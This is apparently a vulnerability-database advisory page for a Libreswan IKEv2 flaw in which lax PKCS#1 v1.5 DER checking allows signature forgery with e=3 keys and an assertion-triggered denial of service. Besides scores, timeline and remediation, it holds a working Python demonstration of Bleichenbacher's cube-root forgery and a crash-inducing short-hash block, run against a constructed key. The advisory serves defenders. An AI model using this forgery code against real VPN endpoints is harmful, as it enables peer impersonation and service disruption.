
Libreswan EUVD-2026-41440

CVE-2026-50722 HIGH
Improper Verification of Cryptographic Signature (CWE-347)
2026-07-02 · libreswan · GHSA-h4cv-5vw8-2p6m
8.1 · CVSS 3.1 · Vendor: libreswan

Severity by source

Vendor (libreswan) PRIMARY
8.1 HIGH
AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
vuln.today AI
8.1 HIGH

Network-reachable and unauthenticated (PR:N); the forgery requires the non-default small-exponent key (e.g. e=3) on the impersonated peer, giving AC:H; impersonation yields C:H/I:H and the daemon-abort DoS gives A:H.

CVSS 3.1: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0: AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (libreswan).

CVSS Vector (Vendor: libreswan)

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
High
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline (5 events)

Analysis Updated · Jul 02, 2026 22:30 · vuln.today · v3 (cvss_changed)
Analysis Updated · Jul 02, 2026 22:29 · vuln.today · v2 (cvss_changed)
Re-analysis Queued · Jul 02, 2026 22:22 · vuln.today · cvss_changed
CVSS changed · Jul 02, 2026 22:22 · NVD · 7.5 (HIGH) → 8.1 (HIGH)
Analysis Generated · Jul 02, 2026 22:16 · vuln.today

Description (CVE.org)

Libreswan, via the function RSA_authenticate_hash_signature_pkcs1_1_5_rsa(), did not correctly verify the DER encoding of the ASN.1 digest when the IKEv2 AUTH payload was encoded using RSASSA-PKCS1-v1_5 (RFC 8017). A remote attacker can use a variation on the Bleichenbacher attack to forge the AUTH payload when small public exponents are used (e.g., e=3), leading to impersonation. Additionally, a remote attacker, by encoding a shorter than expected hash in the AUTH payload, could trigger an assertion leading to denial-of-service. The daemon aborts and restarts; continued exploitation causes sustained denial of service. Remote code execution is not possible. X.509 certificate verifications of the remote IKE peer are not affected.

Analysis (AI)

Peer impersonation and denial-of-service in Libreswan IPsec/IKEv2 arises from improper DER/ASN.1 digest verification in RSA_authenticate_hash_signature_pkcs1_1_5_rsa() when the IKEv2 AUTH payload uses RSASSA-PKCS1-v1_5 signatures. A remote unauthenticated attacker can mount a Bleichenbacher-style forgery to impersonate a peer when small RSA public exponents (e.g., e=3) are in use, or send an undersized hash to trip an assertion that aborts and restarts the daemon for sustained DoS. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Access: reach the IKEv2 listener (UDP/500, UDP/4500)
Delivery: initiate an IKE_AUTH exchange
Exploit: send a forged RSASSA-PKCS1-v1_5 AUTH payload
Execution: the lax DER/DigestInfo check accepts the forged signature (feasible when the impersonated peer's RSA public key uses a small exponent such as e=3)
Persist: impersonate the trusted VPN peer; alternatively, an AUTH payload carrying a shorter-than-expected hash trips the assertion and aborts the daemon
Impact: peer impersonation, or sustained denial of service from repeated daemon aborts and restarts

Vulnerability Assessment (AI)

Exploitation For the impersonation/forgery path, the required condition is that the victim verifies the peer's IKEv2 AUTH payload as a raw RSASSA-PKCS1-v1_5 signature AND the RSA public key configured for that peer has a small public exponent such as e=3; this non-default key configuration is the exact prerequisite and the primary limiting factor (modern keys typically use e=65537, for which the low-exponent forgery does not apply). …
Risk Assessment The NVD CVSS 3.1 score is 8.1 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H): network-reachable and unauthenticated (PR:N), but with high attack complexity (AC:H) reflecting the key-configuration prerequisite and the cryptographic work the forgery requires. …
Exploit Scenario An attacker who can reach the victim's IKEv2 endpoint initiates an IKE_AUTH exchange and submits a forged RSASSA-PKCS1-v1_5 AUTH payload; if the public key configured for the impersonated peer uses a small exponent like e=3, the lax DER check accepts the crafted signature and the attacker is authenticated as that peer, establishing a VPN tunnel. Alternatively, the attacker repeatedly sends AUTH payloads whose DER encoding claims a shorter-than-expected hash, tripping an assertion that aborts the daemon on each attempt for a sustained denial of service. …
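The forgery and the short-hash abort described above, as an added example in Python. This is not Libreswan's code and not the vulnerable function; it is a model of the two behaviours: a lax verifier that stops examining the decoded block after the hash and trusts the DER length byte with an assertion, next to the strict RFC 8017 comparison that rebuilds the whole block. The forgery is Bleichenbacher's 2006 cube-root trick, which needs only the public key. Everything is constructed: the 2048-bit e=3 key is generated from a fixed seed, SHA-256 is an assumed hash (the advisory names neither hash nor key size), the signed octets are a placeholder, and the assert in lax_verify stands in for the daemon's assertion failure.

```python
import functools
import hashlib
import hmac
import random

# DER DigestInfo prefix for SHA-256 (RFC 8017, 9.2, note 1): byte 17 is the OCTET STRING
# tag, byte 18 its length (0x20 = 32), and the 32 hash bytes follow.
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")
SMALL_PRIMES = [p for p in range(3, 2000, 2) if all(p % q for q in range(3, int(p ** 0.5) + 1, 2))]


def emsa_pkcs1_v1_5(msg: bytes, k: int) -> bytes:
    """EMSA-PKCS1-v1_5 (RFC 8017, 9.2): 00 01 FF..FF 00 || DigestInfo, k bytes long."""
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def _probable_prime(n: int, rng: random.Random, rounds: int = 8) -> bool:
    if any(n % p == 0 for p in SMALL_PRIMES):              # trial division, then Miller-Rabin
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_rsa_e3(bits: int, rng: random.Random):
    """Constructed (n, e=3, d): the small-exponent key configuration the advisory describes."""
    def prime():
        while True:
            p = rng.getrandbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
            if p % 3 != 1 and _probable_prime(p, rng):      # keeps gcd(3, p-1) == 1
                return p
    p, q = prime(), prime()
    return p * q, 3, pow(3, -1, (p - 1) * (q - 1))


def lax_verify(n: int, e: int, sig: bytes, msg: bytes) -> bool:
    """The bug pattern: strip padding, match DigestInfo header and hash, ignore the rest."""
    k = (n.bit_length() + 7) // 8
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")   # RSAVP1
    i = em.find(b"\x00", 2)                                           # end of the FF padding
    if em[:2] != b"\x00\x01" or i < 0 or em[2:i] != b"\xff" * (i - 2):
        return False
    t = em[i + 1:]
    if t[:18] != SHA256_DIGESTINFO[:18]:
        return False
    assert t[18] == 32, "passert: unexpected hash length"   # stands in for the daemon abort
    return t[19:51] == hashlib.sha256(msg).digest()         # bytes after the hash never examined


def strict_verify(n: int, e: int, sig: bytes, msg: bytes) -> bool:
    """RFC 8017, 8.2.2: rebuild the expected block and compare the whole thing."""
    k = (n.bit_length() + 7) // 8
    if len(sig) != k or int.from_bytes(sig, "big") >= n:
        return False
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")
    return hmac.compare_digest(em, emsa_pkcs1_v1_5(msg, k))


def icbrt(x: int) -> int:
    r = 1 << ((x.bit_length() + 2) // 3)                    # floor(cbrt(x)), Newton from above
    while True:
        y = (2 * r + x // (r * r)) // 3
        if y >= r:
            return r
        r = y


def craft_e3(n: int, body: bytes) -> bytes:
    """Bleichenbacher's 2006 forgery: 00 01 FF 00 || body at the top of the block, zeros below,
    ceiling cube root. s^3 < n so nothing is reduced mod n; the low bytes of s^3 are garbage."""
    k = (n.bit_length() + 7) // 8
    head = b"\x00\x01\xff\x00" + body                       # works when len(head) < k/3, roughly
    target = int.from_bytes(head + b"\x00" * (k - len(head)), "big")
    s = icbrt(target)
    return (s + 1 if s ** 3 < target else s).to_bytes(k, "big")


@functools.lru_cache(maxsize=None)
def demo(seed: int = 2026) -> dict:
    n, e, d = gen_rsa_e3(2048, random.Random(seed))         # deterministic sample key
    k = (n.bit_length() + 7) // 8
    msg = b"constructed IKEv2 AUTH signed octets"
    h = hashlib.sha256(msg).digest()
    genuine = pow(int.from_bytes(emsa_pkcs1_v1_5(msg, k), "big"), d, n).to_bytes(k, "big")  # RSASP1
    forged = craft_e3(n, SHA256_DIGESTINFO + h)                      # real hash, garbage after it
    short = craft_e3(n, SHA256_DIGESTINFO[:18] + b"\x10" + h[:16])   # DER claims a 16-byte hash
    out = {}
    for name, sig in (("genuine", genuine), ("forged", forged), ("short", short)):
        out[name + "_strict"] = strict_verify(n, e, sig, msg)
        try:
            out[name + "_lax"] = lax_verify(n, e, sig, msg)
        except AssertionError:                              # where the daemon would abort
            out[name + "_lax"] = "abort"
    return out
```

demo() returns six results: both verifiers accept the genuine signature; the lax one also accepts the forged block while the strict one rejects it; and the short-hash block makes the lax path raise (the abort) where the strict path simply returns False. The cube-root trick needs the fixed prefix to occupy less than about a third of the modulus length, which is why a SHA-256 forgery needs a 2048-bit key here while a 1024-bit key already suffices for SHA-1's 15-byte DigestInfo prefix.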
Remediation Apply the vendor-released Libreswan patch published at https://libreswan.org/security/CVE-2026-50722/ and detailed in the advisory https://libreswan.org/security/CVE-2026-50722/CVE-2026-50722.txt; upgrade to the fixed release named in that advisory, as this page does not state a specific fix version. …

Recommended Action (AI)

Within 24 hours: Identify all Libreswan deployments in your infrastructure; document current versions; retrieve the vendor advisory for CVE-2026-50722 to identify the patched version and release date. …

